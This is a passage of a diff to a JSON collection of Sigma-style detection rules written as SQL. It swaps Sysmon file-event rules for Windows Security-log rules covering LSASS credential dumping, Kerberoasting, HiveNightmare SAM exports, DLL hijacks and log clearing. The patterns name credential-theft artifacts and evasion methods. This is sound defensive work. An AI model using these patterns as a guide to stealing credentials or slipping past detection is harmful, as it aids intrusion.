"2131cfb3-8c12-45e8-8fa0-31f5924e9f07", + "title": "Suspicious Outbound Kerberos Connection - Security", + "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", "status": "test", - "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.resource_development", - "attack.t1587", - "cve.2021.1675" + "attack.lateral_movement", + "attack.t1558.003" ], "falsepositives": [ - "Unknown" + "Web Browsers" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_cve_2021_1675_printspooler.yml" + "filename": "win_security_susp_outbound_kerberos_connection.yml" }, { - "title": "Windows Shell File Write to Suspicious Folder", - "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", + "title": "Generic Password Dumper Activity on LSASS", + "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", "status": "experimental", - "description": "Detects a Windows executable that writes files to suspicious folders", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects process handle on LSASS process with certain access mask", + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "tags": [ + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" + ], "falsepositives": [ - "Unknown" + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs%' ESCAPE '\\')) OR ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" ], - "filename": "file_event_win_shell_write_susp_directory.yml" + "filename": "win_security_susp_lsass_dump_generic.yml" }, { - "title": "Powerup Write Hijack DLL", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "title": "Weak Encryption Enabled and Kerberoast", + "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", "status": "test", - "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", - "author": "Subhash Popuri (@pbssubhash)", + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "author": "@neu5ron", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.001" + "attack.t1562.001" ], "falsepositives": [ - "Any powershell script that creates bat files" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" ], - "filename": "file_event_win_hktl_powerup_dllhijacking.yml" + "filename": "win_security_alert_enable_weak_encryption.yml" }, { - "title": "Created Files by Office Applications", - "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", - "status": "experimental", - "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "title": "Enabled User Right in AD to Control User Objects", + "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "status": "test", + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "author": "@neu5ron", "tags": [ - "attack.t1204.002", - "attack.execution" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" ], - "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" + "filename": "win_security_alert_active_directory_user_control.yml" }, { - "title": "Suspicious File Creation In Uncommon AppData Folder", - "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", - "status": "experimental", - "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Password Dumper Activity on LSASS", + "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + "status": "test", + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "author": "sigma", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" ], - "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" + "filename": "win_security_susp_lsass_dump.yml" }, { - "title": "Potential Remote Credential Dumping Activity", - "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "status": "experimental", - "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", - "author": "SecurityAura", + "title": "ETW Logging Disabled In .NET Processes - Registry", + "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" ], - "filename": "file_event_win_remote_cred_dump.yml" + "filename": "win_security_dot_net_etw_tamper.yml" }, { - "title": "Suspicious DotNET CLR Usage Log Artifact", - "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", - "status": "experimental", - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", - "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", + "title": "Security Event Log Cleared", + "id": "a122ac13-daf8-4175-83a2-72c387be339d", + "status": "test", + "description": "Checks for event id 1102 which indicates the security event log was cleared.", + "author": "Saw Winn Naung", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.t1070.001" ], "falsepositives": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + "Legitimate administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')" ], - "filename": "file_event_win_net_cli_artefact.yml" + "filename": "win_security_event_log_cleared.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack", - "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "title": "SMB Create Remote File Admin Share", + "id": "b210394c-ba12-4f89-9117-44a2464b9511", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" + "filename": "win_security_smb_file_creation_admin_shares.yml" }, { - "title": "Suspicious Desktopimgdownldr Target File", - "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "title": "Active Directory User Backdoors", + "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.t1105" + "attack.t1098", + "attack.persistence" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" ], - "filename": "file_event_win_susp_desktopimgdownldr_file.yml" + "filename": "win_security_alert_ad_user_backdoors.yml" }, { - "title": "PowerShell Profile Modification", - "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", - "status": "test", - "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "HieuTT35, Nasreddine Bencherchali", + "title": "User Added to Local Administrators", + "id": "c265cf08-3f99-46c1-8d59-328247057d57", + "status": "stable", + "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.privilege_escalation", - "attack.t1546.013" + "attack.t1078", + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "System administrator creating Powershell profile manually" + "Legitimate administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4732' AND (TargetUserName LIKE 'Administr%' ESCAPE '\\' OR TargetSid = 'S-1-5-32-544')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_powershell_profile.yml" + "filename": "win_security_user_added_to_local_administrators.yml" }, { - "title": "Typical HiveNightmare SAM File Export", - "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", + "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", + "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "status": "test", - "description": "Detects files written by the different tools that exploit HiveNightmare", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "cve.2021.36934" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Files that accidentally contain these strings" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "LSASS Memory Dump File Creation", - "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", - "status": "test", - "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "PetitPotam Suspicious Kerberos TGT Request", + "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "status": "experimental", + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "author": "Mauricio Velazco, Michael Haag", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1187" ], "falsepositives": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" ], - "filename": 